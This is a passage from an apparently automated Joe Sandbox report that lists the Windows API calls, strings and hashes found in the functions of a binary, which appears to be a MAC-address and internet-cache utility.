                                                                                              • EnterCriticalSection.KERNEL32(004D90EC,76F90A60,?,?,004D90D0,004D90D0,?,00460CA5,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845), ref: 0046077A
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000040,?,?,004D90D0,004D90D0,?,00460CA5,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845), ref: 004607CB
                                                                                              • GlobalHandle.KERNEL32(0069F6B0), ref: 004607D4
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004607DE
                                                                                              • GlobalReAlloc.KERNEL32(?,00000040,00002002), ref: 004607F2
                                                                                              • GlobalHandle.KERNEL32(0069F6B0), ref: 00460804
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046080B
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,004D90D0,004D90D0,?,00460CA5,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845,76F90A60), ref: 00460814
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00460820
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00460868
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 2667261700-0
                                                                                              • Opcode ID: be79cf1a9f2181cbec1607a2a329ba81d75bccc53450a23c6bad1a00fdc60394
                                                                                              • Instruction ID: 24ed6f489e8cae63526faeb7cf58e8366cea2fd9f1ea75441c28e41bb40b13db
                                                                                              • Opcode Fuzzy Hash: be79cf1a9f2181cbec1607a2a329ba81d75bccc53450a23c6bad1a00fdc60394
                                                                                              • Instruction Fuzzy Hash: 94317A70A00B04AFC720DF69C848A5BBBF9FF84345B00496EE456D3620EBB4FA44CB55
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00455D53
                                                                                              • GetSystemMetrics.USER32(0000002A), ref: 00455E17
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00455E82
                                                                                              • CreateDialogIndirectParamA.USER32(?,?,?,Function_000557E8,00000000), ref: 00455EB1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                                              • String ID: MS Shell Dlg
                                                                                              • API String ID: 2364537584-76309092
                                                                                              • Opcode ID: d6fb0734ffe8960c20dabb1c74e8d860021aef1a8b9addf3007b9fd67b8e9ffa
                                                                                              • Instruction ID: 60737eb939981e1663e8655a045ed5a825c3ec766cbfdbfa92d2e0a2365db7d1
                                                                                              • Opcode Fuzzy Hash: d6fb0734ffe8960c20dabb1c74e8d860021aef1a8b9addf3007b9fd67b8e9ffa
                                                                                              • Instruction Fuzzy Hash: 6F51C131900605DFCB10EFA4C89A9FEBBB5EF44316F14456BF802A7292D7794E48CB99
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 0043C549
                                                                                              • PtInRect.USER32(?,00000000,?), ref: 0043C556
                                                                                              • SendMessageA.USER32(?,000002A3,?,?), ref: 0043C582
                                                                                              • _TrackMouseEvent.COMCTL32 ref: 0043C5B2
                                                                                              • GetClientRect.USER32(?,?), ref: 0043C653
                                                                                              • PtInRect.USER32(?,00000000,?), ref: 0043C660
                                                                                              • CallWindowProcA.USER32(?,?,?,?,?), ref: 0043C6F0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$Client$CallEventMessageMouseProcSendTrackWindow
                                                                                              • String ID: (sM
                                                                                              • API String ID: 3515703253-3311458642
                                                                                              • Opcode ID: cdbe1d2f7b305334a9fd7dbe55b7a79721ce0a0584e9aa8bf68790838a640f28
                                                                                              • Instruction ID: 8c3f4903dc8baf6d121fe7fb3753f05e18b3a4cd0aa498f358327e813194e9bc
                                                                                              • Opcode Fuzzy Hash: cdbe1d2f7b305334a9fd7dbe55b7a79721ce0a0584e9aa8bf68790838a640f28
                                                                                              • Instruction Fuzzy Hash: 6451C372604210ABC710DB19CCC8E6BB7E9EBC9310F04592FF94697291E739ED05CB6A
                                                                                              APIs
                                                                                              • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 0042D0B4
                                                                                              • GetLogicalDrives.KERNEL32 ref: 0042D0B6
                                                                                              • SendMessageA.USER32(?,00000143,00000000,?), ref: 0042D129
                                                                                              • SendMessageA.USER32(?,00000151,?,-00000041), ref: 0042D13D
                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0042D188
                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0042D19A
                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0042D1AB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DrivesLogical
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 501861121-3142399695
                                                                                              • Opcode ID: 195e983572fe163143436136a0c3a57196b6e27e3f640e6ba4a67512ad92c815
                                                                                              • Instruction ID: 9dc9e9830e61ed712b0ca2553cde3fd99fe03222a10af47223d38b0de3f2946a
                                                                                              • Opcode Fuzzy Hash: 195e983572fe163143436136a0c3a57196b6e27e3f640e6ba4a67512ad92c815
                                                                                              • Instruction Fuzzy Hash: FB31CF71700711ABD600CF28CC81F5BF7A8FB88720F108A19F5599B2D1CBB8E8058BE5
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 00460FD2
                                                                                              • PathFindExtensionA.SHLWAPI(?), ref: 00460FEC
                                                                                              • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00461086
                                                                                              • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004610B3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                                                                              • String ID: .CHM$.HLP$.INI
                                                                                              • API String ID: 2140653559-4017452060
                                                                                              • Opcode ID: d61ad15ca87f6a7e6e9c15fe4987d482b5de92941cd876a8ebf14581f8cd0a80
                                                                                              • Instruction ID: b47048ef5958d033ffe7bf5904ed0b4a0b0cffc92f540df513db9c3eee53b71e
                                                                                              • Opcode Fuzzy Hash: d61ad15ca87f6a7e6e9c15fe4987d482b5de92941cd876a8ebf14581f8cd0a80
                                                                                              • Instruction Fuzzy Hash: 04413B719007489FDF70DF66D884ADB77E8AB08344F14482BE946C6651FB78D984CB26
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 0045BEAA
                                                                                              • GetSystemMetrics.USER32(0000000C), ref: 0045BEB1
                                                                                              • GetSystemMetrics.USER32(00000002), ref: 0045BEB8
                                                                                              • GetSystemMetrics.USER32(00000003), ref: 0045BEC2
                                                                                              • GetDC.USER32(00000000), ref: 0045BECC
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0045BEDD
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045BEE5
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0045BEED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                              • String ID:
                                                                                              • API String ID: 1031845853-0
                                                                                              • Opcode ID: 82800fdedd8725303c786ebbd9317c47ed0af43c279096a4199732bebe051ac8
                                                                                              • Instruction ID: b07b7a82b072b39a71f8a96b90e28bccc6b23350fc1b81c5107f06a5aa9eb94c
                                                                                              • Opcode Fuzzy Hash: 82800fdedd8725303c786ebbd9317c47ed0af43c279096a4199732bebe051ac8
                                                                                              • Instruction Fuzzy Hash: 36F03071A40B04AEE7206F71AC4DF2B7BA4EB85B61F01452AE6428B2D0DBB59C018F54
                                                                                              APIs
                                                                                              • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 0042FA06
                                                                                              • SendMessageA.USER32(?,00000143,00000000,?), ref: 0042FA99
                                                                                              • SendMessageA.USER32(?,00000151,00000000,?), ref: 0042FAB1
                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0042FAC9
                                                                                                • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                                                                                • Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                                                                                • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                                                                              Strings
                                                                                              • Have no usable adapters, MAC Address can't Modify!, xrefs: 0042FAEE
                                                                                              • Error, xrefs: 0042FAE9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$CallbackDispatcherItemUser
                                                                                              • String ID: Error$Have no usable adapters, MAC Address can't Modify!
                                                                                              • API String ID: 670485088-1610973038
                                                                                              • Opcode ID: 64ba300292b3db6ed030f1794b6d82e1f6d5c0e80a847244029c72630f60c34a
                                                                                              • Instruction ID: 26f2146aec7202859a8a0788ea455b2750414a0d6ce9a465af84665d90ab2efc
                                                                                              • Opcode Fuzzy Hash: 64ba300292b3db6ed030f1794b6d82e1f6d5c0e80a847244029c72630f60c34a
                                                                                              • Instruction Fuzzy Hash: 43410DB1344700EBD721DB25CC82F9BB7E9ABD4704F40092EF59A973C2DA78A909C759
                                                                                              APIs
                                                                                              • FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 00402A03
                                                                                              • FindNextUrlCacheEntryA.WININET(00000000,00000000,?), ref: 00402A1B
                                                                                              • GetLastError.KERNEL32 ref: 00402A29
                                                                                              • DeleteUrlCacheEntry.WININET(?), ref: 00402A96
                                                                                              • FindCloseUrlCache.WININET(00000000), ref: 00402B14
                                                                                              Strings
                                                                                              • There is an error (%d) when trying deleting temporary internet files., xrefs: 00402ACA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Cache$EntryFind$CloseDeleteErrorFirstLastNext
                                                                                              • String ID: There is an error (%d) when trying deleting temporary internet files.
                                                                                              • API String ID: 2077925056-841692006
                                                                                              • Opcode ID: 91c8082cfd02f721169656c60f1eef05379fc8cc86d5905a9375c55cfa756d04
                                                                                              • Instruction ID: 94eec7699a4fa6117de3be0bb099d12cbcff65c4a93994e37f97ae03476e8131
                                                                                              • Opcode Fuzzy Hash: 91c8082cfd02f721169656c60f1eef05379fc8cc86d5905a9375c55cfa756d04
                                                                                              • Instruction Fuzzy Hash: 9341B8712047019FC310DF55C948A1BB7E9BB85325F144B3EF456A32D1EBB8D805CB5A
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 0045726D
                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00457294
                                                                                              • UpdateWindow.USER32(?), ref: 004572AE
                                                                                              • SendMessageA.USER32(?,00000121,00000000,?), ref: 004572D2
                                                                                              • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 004572EC
                                                                                              • UpdateWindow.USER32(?), ref: 00457332
                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00457366
                                                                                                • Part of subcall function 0045982D: GetWindowLongA.USER32(?,000000F0), ref: 00459838
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                              • String ID:
                                                                                              • API String ID: 2853195852-0
                                                                                              • Opcode ID: 9e8f7087b82af985ab798514f66e41ff7fa4c330841c0b124aedac182aa905d9
                                                                                              • Instruction ID: 32369ea9d48cbdeecc609184201b7489618483d9b436833af93530d3bdef152a
                                                                                              • Opcode Fuzzy Hash: 9e8f7087b82af985ab798514f66e41ff7fa4c330841c0b124aedac182aa905d9
                                                                                              • Instruction Fuzzy Hash: 2941C130108741ABD7319F26AC45A1FBAF4EBC1716F100A7EFC81416A2DB69C84DC65A
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 0043C733
                                                                                              • PtInRect.USER32(?,?,?), ref: 0043C740
                                                                                              • SendMessageA.USER32(?,000002A3,?,?), ref: 0043C757
                                                                                              • _TrackMouseEvent.COMCTL32 ref: 0043C787
                                                                                              • CallWindowProcA.USER32(?,?,?,?,?), ref: 0043C803
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$CallClientEventMessageMouseProcSendTrackWindow
                                                                                              • String ID: (sM
                                                                                              • API String ID: 1649741670-3311458642
                                                                                              • Opcode ID: b0d427d859c20ecab4461198b410d0e46f96276c2dd783494e8c7bae7b6a58f4
                                                                                              • Instruction ID: 898cb067ecc559f41ab13f6a3b788ad7c7261948081919be5936e31082410bb8
                                                                                              • Opcode Fuzzy Hash: b0d427d859c20ecab4461198b410d0e46f96276c2dd783494e8c7bae7b6a58f4
                                                                                              • Instruction Fuzzy Hash: 5921D071209301AFD310DF54DC88E6B77A9EB8D324F40192EF95697281E778D9098BAB
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,0045C864,?,?,?,?,76F90A60,00000000,?,00448293,00000000), ref: 004610E8
                                                                                              • SetErrorMode.KERNEL32(00000000,?,00448293,00000000), ref: 004610F0
                                                                                              • GetModuleHandleA.KERNEL32(user32.dll,00448293,00000000), ref: 0046113B
                                                                                              • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0046114B
                                                                                                • Part of subcall function 00460F91: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 00460FD2
                                                                                                • Part of subcall function 00460F91: PathFindExtensionA.SHLWAPI(?), ref: 00460FEC
                                                                                                • Part of subcall function 00460F91: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00461086
                                                                                                • Part of subcall function 00460F91: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004610B3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                                              • String ID: NotifyWinEvent$user32.dll
                                                                                              • API String ID: 4004864024-597752486
                                                                                              • Opcode ID: dcbdc58545cd4e1162221064df486b16a652db97318d6272985f662fc1f80566
                                                                                              • Instruction ID: 615a388b9bcc3293a458a96628157c91bad4f8643237e7b27ee424f6813bd525
                                                                                              • Opcode Fuzzy Hash: dcbdc58545cd4e1162221064df486b16a652db97318d6272985f662fc1f80566
                                                                                              • Instruction Fuzzy Hash: EB014F74A002508FC720AF259844A9A3BE8AF49758F05445FF5849B362EB79C800CB5B
                                                                                              APIs
                                                                                                • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                                                                              • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438E58
                                                                                              • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438E73
                                                                                              • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438E8E
                                                                                              • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438EA9
                                                                                              • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438EC4
                                                                                              • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438EDF
                                                                                                • Part of subcall function 00436B70: RegOpenKeyExA.KERNEL32 ref: 00436BD0
                                                                                                • Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$H_prologItemOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2983078765-0
                                                                                              • Opcode ID: bee28f99374385575d7cab4925c685f48e7f35793e92d94da914d8f9674fc980
                                                                                              • Instruction ID: f8e102232e88c27b8a68ebd60c734d88dc141a5e6a7d4b07252fac42151194af
                                                                                              • Opcode Fuzzy Hash: bee28f99374385575d7cab4925c685f48e7f35793e92d94da914d8f9674fc980
